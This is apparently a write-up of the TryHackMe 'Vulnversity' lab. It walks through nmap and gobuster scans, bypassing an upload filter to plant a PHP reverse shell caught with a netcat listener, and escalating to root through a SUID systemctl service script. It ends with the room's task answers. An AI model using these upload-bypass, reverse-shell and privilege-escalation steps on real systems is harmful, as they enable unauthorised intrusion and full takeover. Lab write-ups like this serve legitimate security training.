TryHackMe - Vulnversity
Nmap
┌──(root💀kali)-[~]
└─# nmap -T5 -sC -sV -O -Pn -p- 10.10.72.158
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 14:04 EDT
Warning: 10.10.72.158 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.72.158
Host is up (0.22s latency).
Not shown: 65508 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1281/tcp filtered healthd
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
[STRIPPED]
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Linux 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2022-05-08T14:16:34-04:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-05-08T18:16:34
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 710.19 seconds
Initial foothold
If we go to http://10.10.72.158:3333/ we have a website. However the content is not really useful for us. We can run gobuster, that is how we find the folder internal
┌──(root💀kali)-[~/Documents/tryhackme/vulnversity]
└─# gobuster dir -u http://10.10.72.158:3333/ --wildcard -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.72.158:3333/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/05/08 14:17:29 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 320] [--> http://10.10.72.158:3333/images/]
/css (Status: 301) [Size: 317] [--> http://10.10.72.158:3333/css/]
/js (Status: 301) [Size: 316] [--> http://10.10.72.158:3333/js/]
/fonts (Status: 301) [Size: 319] [--> http://10.10.72.158:3333/fonts/]
/internal (Status: 301) [Size: 322] [--> http://10.10.72.158:3333/internal/]
This a page with a file upload fonctionnality. This is perfect for a reverse shell
After a few tries with burp, the accepted exentions is phtml. You can also fuzz it with burp intruder and make a grep match on "extension not allowed" to see which one will be allowed.
We edit php revershell (on kali we have it preinstalled)
cp /usr/share/webshells/php/php-reverse-shell.php .
we rename it in the accepted extensionmv php-reverse-shell.php php-reverse-shell.phtml
nc -lvp 4444
We set up our listenerNow as mentioned we just need to go to
http://<ip>:3333/internal/uploads/php-reverse-shell.phtml
to execute our shell (if this was not specified we could have run gobuster in the internal folderWe get a shell as
www-data
Privesc
Now let's enumerate our ways to privesc
find / -perm -u=s -type f 2>/dev/null
We have a few files with suid bit on
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/at
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/squid/pinger
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/ntfs-3g
/bin/mount
/bin/ping6
/bin/umount
/bin/systemctl
/bin/ping
/bin/fusermount
/sbin/mount.cifs
We have a GTFOBins entry for
/bin/systemctl
hereLet's try the exploitation
It creates a service in an env
It will create a temp file in the syst as a service
This will execute a command with bin/sh (in GTFObins it will execute id) in our case we could try to output our root flag in the output folder. It will then set a link and enable it
Here is our modified script
TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
Once we pasted all our commands above we just need to
cat /tmp/output
and this will give us the root flag.
Questions
Task 2
Scan the box, how many ports are open?
Answer6
What version of the squid proxy is running on the machine?
Answer3.5.12
How many ports will nmap scan if the flag -p-400 was used?
Answer400
Using the nmap flag -n what will it not resolve?
AnswerDNS
What is the most likely operating system this machine is running?
AnswerUbuntu
What port is the web server running on?
Answer3333
Task 3
What is the directory that has an upload form page?
Answer/internal/
Task 4
Run this attack, what extension is allowed?
Answerphtml
What is the name of the user who manages the webserver?
Answerbill
What is the user flag?
I will let you do this on your own Hint:cat /home/bill/user.txt
Task 5
On the system, search for all SUID files. What file stands out?
Answer/bin/systemctl
Become root and get the last flag (/root/root.txt)
I will let you do this on your own Hint:cat /root/root.txt
Last updated